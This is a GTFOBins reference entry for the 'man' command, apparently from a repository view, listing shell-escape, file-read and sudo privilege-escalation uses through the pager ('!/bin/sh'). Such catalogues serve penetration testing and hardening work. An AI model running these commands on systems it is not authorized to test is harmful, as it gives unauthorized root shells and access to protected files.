GTFOBins.github.io/_gtfobins/man.md
2021-02-05 13:41:12 +01:00

15 lines
299 B
Markdown

---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
shell:
- code: |
man man
!/bin/sh
file-read:
- code: man file_to_read
sudo:
- code: |
sudo man man
!/bin/sh
---